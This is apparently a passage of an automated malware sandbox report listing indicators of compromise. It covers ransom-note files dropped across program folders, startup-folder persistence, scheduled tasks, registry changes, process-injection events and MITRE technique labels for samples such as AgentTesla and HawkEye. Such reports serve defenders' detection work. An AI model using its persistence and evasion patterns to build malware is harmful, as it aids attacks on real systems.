File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Msg_Received.m4a	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\selector.js	AnyDesk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\assets_picker-account-addPerson-48.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeSmallTile.scale-100.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Square310x310Logo.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_ForwardDirection_RoomScale.jpg	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-black_scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\198.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W5.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-36_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileVisio32x32.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\FileAssociation\FileAssociation.targetsize-24.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Square150x150Logo.scale-400.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\MarkAsReadToastQuickAction.scale-80.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-100.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TinyTile.scale-125_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-32_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\FetchingMail.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-400.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7dd.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Third Party Notices.txt	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_altform-lightunplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24_altform-colorize.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_activityAlert.targetsize-48.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-white_scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-125_contrast-black.png	AnyDesk.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Start Menu\Programs\Startup\Scare.hta	mshta.exe
File created	C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe	Prolin.exe
File created	C:\Windows\LucKey.exe	Maldal.a.exe
File opened for modification	C:\Windows\LucKey.exe	Maldal.a.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
11504	sc.exe
12320	sc.exe
8692	sc.exe
14592	sc.exe
11244	sc.exe
11820	sc.exe
12992	sc.exe
12340	sc.exe
9996	sc.exe
11660	sc.exe
10520	sc.exe
5240	sc.exe
9076	sc.exe
16188	sc.exe
18100	sc.exe
12292	sc.exe
15772	sc.exe
7296	sc.exe
7496	sc.exe
9308	sc.exe
16364	sc.exe
14716	sc.exe
9292	sc.exe
16640	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3672	18384	WerFault.exe	640

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Winevar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pikachu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Prolin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mari.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HawkEye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NakedWife.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maldal.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ButterflyOnDesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WIN2CC7.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
18656	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
14128	timeout.exe
10776	timeout.exe
11992	timeout.exe
17992	timeout.exe
6832	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
8612	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
8628	taskkill.exe
12624	taskkill.exe
18504	taskkill.exe
9132	taskkill.exe
2404	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135553"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2895348275"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{D7CFA743-8334-11EF-818E-4E01FFCF908D} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135553"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135553"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2895348275"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135553"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2897008183"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2897008183"	iexplore.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft	WIN2CC7.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft\DataFactory	WIN2CC7.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\appro@openssl.org	WIN2CC7.pif
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
12220	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 453242.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 424103.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
13160	regedit.exe
14496	regedit.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
18656	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
10108	schtasks.exe
6312	schtasks.exe
12980	schtasks.exe
15972	schtasks.exe
18944	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2172	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1712	msedge.exe
1712	msedge.exe
3212	msedge.exe
3212	msedge.exe
4844	identity_helper.exe
4844	identity_helper.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
3820	msedge.exe
3820	msedge.exe
912	msedge.exe
912	msedge.exe
3404	AnyDesk.exe
3404	AnyDesk.exe
3404	AnyDesk.exe
3404	AnyDesk.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs

pid	Process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: 33	1320	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1320	AUDIODG.EXE
Token: SeDebugPrivilege	3404	AnyDesk.exe
Token: SeDebugPrivilege	3164	HawkEye.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
3212	msedge.exe
3212	msedge.exe
2928	AnyDesk.exe
2928	AnyDesk.exe
660	AgentTesla.exe
1836	iexplore.exe
1836	iexplore.exe
5256	IEXPLORE.EXE
5256	IEXPLORE.EXE
5956	Pikachu.exe
6080	NakedWife.exe
3672	Prolin.exe
4840	OpenWith.exe
4380	Maldal.a.exe
2280	Mari.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3212 wrote to memory of 3644	3212	msedge.exe	82
PID 3212 wrote to memory of 3644	3212	msedge.exe	82
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1800	3212	msedge.exe	83
PID 3212 wrote to memory of 1712	3212	msedge.exe	84
PID 3212 wrote to memory of 1712	3212	msedge.exe	84
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
